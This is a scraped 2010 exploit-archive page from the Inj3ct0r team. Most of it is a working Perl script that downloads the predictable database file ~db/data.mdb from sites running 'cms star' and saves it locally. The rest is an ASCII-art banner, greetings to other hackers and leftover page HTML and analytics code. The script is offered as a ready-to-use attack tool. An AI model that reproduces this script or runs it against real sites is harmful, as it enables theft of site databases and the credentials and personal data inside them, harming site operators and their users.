Home / os / win7

cms star Database Disclosure Exploit

Posted on 07 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>cms star Database Disclosure Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================== cms star Database Disclosure Exploit ==================================== #!/usr/bin/perl -w # # cms star Database Disclosure Exploit # # Found &amp; Coded: indoushka # # Date: 25/07/2010 # # Home: www.sec4ever.com # # Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel # special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller # Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net # MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH # # Download : http://www.cmsstar.com/ use LWP::Simple; use LWP::UserAgent; system('cls'); system('title cms star Database Disclosure Exploit'); system('color a'); if(@ARGV &lt; 2) { print &quot;[-]How To Use &quot;; &amp;help; exit(); } sub help() { print &quot;[+] usage1 : perl $0 site.com /path/ &quot;; print &quot;[+] usage2 : perl $0 localhost / &quot;; } print &quot; ********************************************************************** &quot;; print &quot; 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 &quot;; print &quot; _ __ __ __ 1 &quot;; print &quot;1 /' __ /'__` / \__ /'__` 0 &quot;; print &quot; /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 &quot;; print &quot;1 /_/ /' _ ` / /_/_\_&lt;_ /'___ / /`'__ 0 &quot;; print &quot; / / / / \__/ \_ \_ / 1 &quot;; print &quot;1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 &quot;; print &quot; /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 &quot;; print &quot;1 \____/ &gt;&gt; Exploit database separated by exploit 0 &quot;; print &quot; /___/ type (local, remote, DoS, etc.) 1 &quot;; print &quot;1 1 &quot;; print &quot; [+] Site : Inj3ct0r.com 0 &quot;; print &quot;1 [+] Support e-mail : submit[at]inj3ct0r.com 1 &quot;; print &quot; 0 &quot;; print &quot;1 ####################################### 1 &quot;; print &quot; I'm indoushka member from Inj3ct0r Team 1 &quot;; print &quot;1 ####################################### 0 &quot;; print &quot;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 &quot;; ($TargetIP, $path, $File,) = @ARGV; $File=&quot;~db/data.mdb&quot;; my $url = &quot;http://&quot; . $TargetIP . $path . $File; print &quot; wait!!! &quot;; my $useragent = LWP::UserAgent-&gt;new(); my $request = $useragent-&gt;get($url,&quot;:content_file&quot; =&gt; &quot;D:/data.mdb&quot;); if ($request-&gt;is_success) { print &quot;[+] $url Exploited! &quot;; print &quot;[+] Database saved to D:/data.mdb &quot;; exit(); } else { print &quot;[!] Exploiting $url Failed ! [!] &quot;.$request-&gt;status_line.&quot; &quot;; exit(); } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP